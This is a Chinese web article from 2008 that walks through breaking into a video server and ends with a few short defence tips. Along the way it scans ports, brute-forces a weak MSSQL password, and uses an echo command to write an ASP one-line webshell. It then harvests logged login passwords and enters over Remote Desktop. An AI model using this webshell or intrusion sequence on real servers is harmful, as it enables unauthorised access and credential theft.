登录论坛 | 注册会员 设为首页 | 收藏本站
当前位置 : 首页>软件学院>网络技术>黑客攻防>正文
 
从入侵实例看视频服务器安全部署

http://www.dbit.cn 2008/5/21 16:58:12  来源:本站  编辑:张佳奇
 
  视频服务器都会提供大量的视频资源,大部分都提供了在线观看以及下载服务。对于流量要求比较高,而从服务器本身的部署来看,也有一些特别之处。我们从一个入侵实例来看看视频服务器中暴露出的弱点。

  寻找漏洞

  我们找到一个目标。首先用工具扫描了一下,显示没有注入点,用Webtool只扫到了后台,也没发现社区程序,看来从网站下手不太可能了。再来看下系统的安全性怎么样,从IIS写权限扫描器的结果看不存在IIS写入漏洞,用Superscan刺探端口信息,如图1所示,居然开了3389。利用远程终端登录一下得知系统是Windows 2003系统,现在基本可以确定服务器的构架了:Windows 2003+IIS6.0+MSSQL+asp。

  再用极速MsSQL弱口令扫描器,挂上字典后开始扫描,过了几分钟扫描到了弱口令!,拿下服务器有一丝丝希望了,再拿出MsSQL连接器连接,连接成功。在MsSQL的中CMD中利用dir命令找到了Web目录,执行echo “<%execute request(”cmd”)%>”>>c:\”program files”\viewgood\webvod\webmedia\test.asp,建了一个一句话木马,断开连接,用一句话客户端连接,成功进入,可以浏览几乎所有文件,但很多目录没有写权限。查看了系统服务和端口,由于安装的东西太少了,没有Serv-u、PCAnywhere、Radmin等,提权又变得有点困难了。

  成功入侵

  在c:\Inetpub\下发现了NTpass.dll,这正是Goldsun写的记录系统登录密码的文件。来到这个程序记录信息存放的位置%systemroot%\system32\eulagold.txt(%systemroot%指系统目录,这里就该是c:\windows),用刚才的权限打开,发现里面记录了很多用户的登录密码,其中还有Guest用户,利用3389端口登录,得到桌面权限了。

  部署细节

  这次的入侵看似更多的是运气,可仔细分析一下还是比较有价值的,尤其是对于用户对于服务器的安全部署很有借鉴意义。大体有以下几点:

  1.弱口令的防范

  2.服务器文件的常规检测

  3.对于用户的把控,尤其是视频服务器会提供web形式的会员形式,查看异常会员情况。

  4.必要端口的封锁
收藏】【打印】【进入论坛
  相关文章:

·日本研究者发现一分钟攻破WPA技术 
·黑客攻防:网站常见后门总结
·拒绝黑客巧设网站目录与数据库权限 
·防止网络服务器被黑的安全技巧
·实例演示IPC$ 135弱口令入侵技巧
·网络行为分析与拒绝服务攻击分析
·为您揭露攻击者最阴险的七大黑技
·教你找到电脑中隐藏的入侵的黑手 
·硬件入侵检测系统完全导购
·计算机网络攻击常见手法及防范
·黑客如何查找互联网网络安全漏洞

 
 
 
最新文章

抢先苹果,消息称英特尔芯片采用台积电
三星揭晓业内首款单条 512GB DDR5 内存
vivo 高端新机爆料:120Hz 曲面屏 + 天
vivo Y21 在印度正式上市:Helio P35 芯
微星推出 GeForce RTX 3080 Sea Hawk X
消息称三星 Galaxy Tab S8 系列平板将放
机械革命推出 F6 轻薄本:16 英寸全面屏
英特尔 12 代 Alder Lake CPU 600 系列
雷军:向小米手机 1 首批用户每人赠送价
小米李明谈用户被踢出 MIUI 测试版:大

推荐文章
1
2
3
4
5
6
7
8
9
10
叛逆嫩模性感写真
宫如敏不雅照疯传 看张馨予韩一菲兽兽谁
不惧孔子抢位 阿凡达游戏影音配置推荐
2015第十七届“东北安博会”火爆招商
第十六届东北国际公共安全防范产品博览
2016年第五届中国国际商业信息化博览会
2016年第五届中国国际POS机及相关设备展
互联网电视熟了吗 2013最火电视深解析
桑达获邀出席2015中国(广州)国际POS机
宝获利报名参加“2015年度中国POS机行业
八卦图解 More>>
叛逆嫩模性感写真 宫如敏不雅照疯传 看张馨予韩一菲
周伟童魔鬼身材日本性感写真图  联想V360笔记本模特写真